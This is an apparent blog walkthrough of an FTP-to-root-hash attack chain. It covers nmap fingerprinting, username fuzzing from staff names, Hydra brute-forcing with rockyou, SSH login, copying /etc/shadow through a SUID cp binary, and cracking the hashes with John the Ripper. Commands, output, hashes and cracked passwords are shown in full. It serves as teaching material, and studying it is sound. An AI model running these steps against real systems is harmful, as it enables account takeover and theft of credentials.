We first do a quick nmap scan against the remote host ftp.acme.com and try and fingerprint the current ftp service running.
root@asus:~% nmap -sV -T4 ftp.acme.com Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-02 20:18 MDT Nmap scan report for ftp.acme.com (ftp.acme.com) Host is up (0.000073s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.88 seconds root@asus:~%
We see the remote host is indeed serving up the FTP protocol. Let now try and connect to the remote ftp server using the telnet program and issue some commands.
root@asus:~% telnet ftp.acme.com 21 Trying ftp.acme.com... Connected to ftp.acme.com. Escape character is '^]'. 220 (vsFTPd 3.0.3) quit 221 Goodbye. Connection closed by foreign host. root@asus:~%
Our next step is to see if the ftp server allows anonymous connections.
sam@asus:~% ftp ftp> open ftp.acme.com Connected to ftp.acme.com. 220 (vsFTPd 3.0.3) Name (ftp.acme.com:sam): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp>
We can connect anonymously, but there is nothing in the directory. our next test will see if we can upload files to the server anonymously.
ftp> put test.txt local: test.txt remote: test.txt 200 PORT command successful. Consider using PASV. 553 Could not create file. ftp>
No luck here. One thing we can do is take information such as names from the company's website and try to fuzz for possible ftp users on the server.
FTP User Enumeration
We have some names from the company website which we will use to fuzz valid usernames for the ftp server. We can use our username script from Enumerating UNIX Usernames to generate a list of possible usernames on the server from the list of users we got from the website.
clare johnson vance patel hayden smith sasha reed jared wilson
sam@asus:~/pentest_notes% perl username-fuzz.pl hayden smith hayden smith haysmith smithhay s.hayden s_hayden s-hayden smihayden hayden.smith hayden_smith hayden-smith h.smith h_smith h-smith smith.ha smith_ha smith-ha haydensm smhayden ...
Once we have a list of possible usernames we can now move on to using hydra to find out the username format. All we need is one user to test for, after that we can apply to username rules to the remaining names on the list.
For our payloads we will use a list of common usernames formats for the user list and the rockyou wordlist for the passwords. With some luck we should be able to find some valid user/password combinations using Hydra.
sam@asus:~% hydra -L haydensmith.txt -P rockyou.txt ftp://ftp.acme.com Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53 [DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task [DATA] attacking service ftp on port 21 [21][ftp] host: ftp.acme.com login: hayden password: ashley 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31 sam@asus:~%
We found a valid user/pass combination and username format for the remote FTP server. Now we need to construct a new list of usernames using the format we found via Hydra and repeat the process for the other users.
Finding Valid FTP Accounts
Our user.txt should look like so:
clare vance hayden sasha jared
sam@asus:~% hydra -L users.txt -P rockyou.txt ftp://ftp.acme.com Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53 [DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task [DATA] attacking service ftp on port 21 [21][ftp] host: ftp.acme.com login: jared password: qwerty [21][ftp] host: ftp.acme.com login: vance password: 654321 [21][ftp] host: ftp.acme.com login: clare password: jessica [21][ftp] host: ftp.acme.com login: sasha password: michael [21][ftp] host: ftp.acme.com login: hayden password: ashley 1 of 1 target successfully completed, 5 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31 sam@asus:~%
We successfully found credentials for all the usernames in the list.
Browsing FTP directories
sam@asus:~% ftp ftp> open 148.32.42.5 Connected to 148.32.42.5. 220 (vsFTPd 3.0.3) Name (148.32.42.5:sam): hayden 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. dr-xr-xr-x 4 65534 65534 4096 May 15 07:49 ftp -rw-rw-r-- 1 1005 1005 48605 Sep 12 17:38 home.tar.gz drwx------ 2 1005 1005 4096 May 01 09:44 mail -rwxr--r-- 1 1005 1005 594 Sep 02 14:54 server.pl 226 Directory send OK. ftp> get home.tar.gz local: home.tar.gz remote: home.tar.gz 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for home.tar.gz (48605 bytes). 226 Transfer complete. 48605 bytes received in 0.00 secs (9.9986 MB/s) ftp> exit 221 Goodbye. sam@asus:~%
We check the bash history file for interesting finds.
Trying to login to SSH
We can try and login to ssh with the supplied crededitnails to see if we get lucky or not.
sam@asus:~% ssh -l clare 148.32.42.5 clare@148.32.42.5's password: Welcome to GalliumOS 2.1 (GNU/Linux 4.9.4-galliumos-braswell x86_64) * Documentation: https://wiki.galliumos.org/ * Support: https://reddit.com/r/GalliumOS Last login: Tue Sep 3 13:40:25 2019 from 148.32.42.5 clare@asus:~$ sudo -l [sudo] password for clare: Sorry, user clare may not run sudo on asus. clare@asus:~$
As we can see the user clare is not in the sudoers file. Our next step is to check for SUID binaries to see if we can execute commands as a higher privelege user such as root.
clare@asus:~$ find / -perm -u=s -type f 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/virtualbox/VBoxHeadless /usr/lib/virtualbox/VBoxNetDHCP /usr/lib/virtualbox/VBoxNetAdpCtl /usr/lib/virtualbox/VBoxSDL /usr/lib/virtualbox/VirtualBox /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/galliumos-update/update_package_index /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/chromium-browser/chrome-sandbox /usr/bin/perl5.22.1 /usr/bin/chfn /usr/bin/newgrp /usr/bin/passwd /usr/bin/gpasswd /usr/bin/chsh /usr/bin/tcptraceroute.mt /usr/bin/perl /usr/bin/sudo /usr/bin/gawk /usr/bin/pkexec /usr/sbin/pppd /home/sam/unix/prog /bin/ping6 /bin/su /bin/ping /bin/fusermount /bin/mount /bin/cp /bin/umount /sbin/mount.nfs /sbin/mount.ecryptfs_private clare@asus:~$
We see that the 'cp' command is suid able. all we need to do is cp the /etc/shadow file to a file in our home directory and crack the remaining hashes with john the ripper.
clare@asus:~$ cp /etc/shadow .shadow clare@asus:~$ ls -l .shadow -rw-r----- 1 root clare 2199 Sep 12 20:19 .shadow clare@asus:~$ cat .shadow root:!:17866:0:99999:7::: daemon:*:17200:0:99999:7::: bin:*:17200:0:99999:7::: sys:*:17200:0:99999:7::: sync:*:17200:0:99999:7::: games:*:17200:0:99999:7::: man:*:17200:0:99999:7::: lp:*:17200:0:99999:7::: mail:*:17200:0:99999:7::: news:*:17200:0:99999:7::: uucp:*:17200:0:99999:7::: proxy:*:17200:0:99999:7::: www-data:*:17200:0:99999:7::: backup:*:17200:0:99999:7::: list:*:17200:0:99999:7::: irc:*:17200:0:99999:7::: gnats:*:17200:0:99999:7::: nobody:*:17200:0:99999:7::: systemd-timesync:*:17200:0:99999:7::: systemd-network:*:17200:0:99999:7::: systemd-resolve:*:17200:0:99999:7::: systemd-bus-proxy:*:17200:0:99999:7::: messagebus:*:17200:0:99999:7::: syslog:*:17200:0:99999:7::: _apt:*:17200:0:99999:7::: ntp:*:17225:0:99999:7::: avahi-autoipd:*:17225:0:99999:7::: avahi:*:17225:0:99999:7::: colord:*:17225:0:99999:7::: dnsmasq:*:17225:0:99999:7::: pulse:*:17225:0:99999:7::: hplip:*:17225:0:99999:7::: rtkit:*:17225:0:99999:7::: saned:*:17225:0:99999:7::: usbmux:*:17225:0:99999:7::: speech-dispatcher:!:17225:0:99999:7::: uuidd:*:17225:0:99999:7::: statd:*:17873:0:99999:7::: mysql:!:17897:0:99999:7::: openldap:!:17906:0:99999:7::: snmp:*:18010:0:99999:7::: postfix:*:18013:0:99999:7::: clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.:18013:0:99999:7::: vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.:18013:0:99999:7::: sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60:18013:0:99999:7::: hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.:18013:0:99999:7::: jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0:18013:0:99999:7::: dovecot:*:18014:0:99999:7::: dovenull:*:18014:0:99999:7::: bind:*:18015:0:99999:7::: ftp:*:18031:0:99999:7::: sshd:*:18142:0:99999:7::: clare@asus:~$
Cracking Passwords with John The Ripper
we load up the .pot file for john to run against.
clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx. vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw. sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60 hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg. jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0
Here we will use the rockyou word list with the users and password hashes in the .pot file.
root@asus:~/src/john/run% ./john --wordlist=/home/sam/rockyou.txt /home/sam/john.pot Using default input encoding: UTF-8 Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE4.1 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status jessica (clare) qwerty (jared) 654321 (vance) ashley (hayden) michael (sasha) 5g 0:00:00:03 DONE (2019-09-12 19:26) 1.412g/s 36.15p/s 180.7c/s 180.7C/s 123456..diamond Use the "--show" option to display all of the cracked passwords reliably Session completed root@asus:~/src/john/run%
No comments:
Post a Comment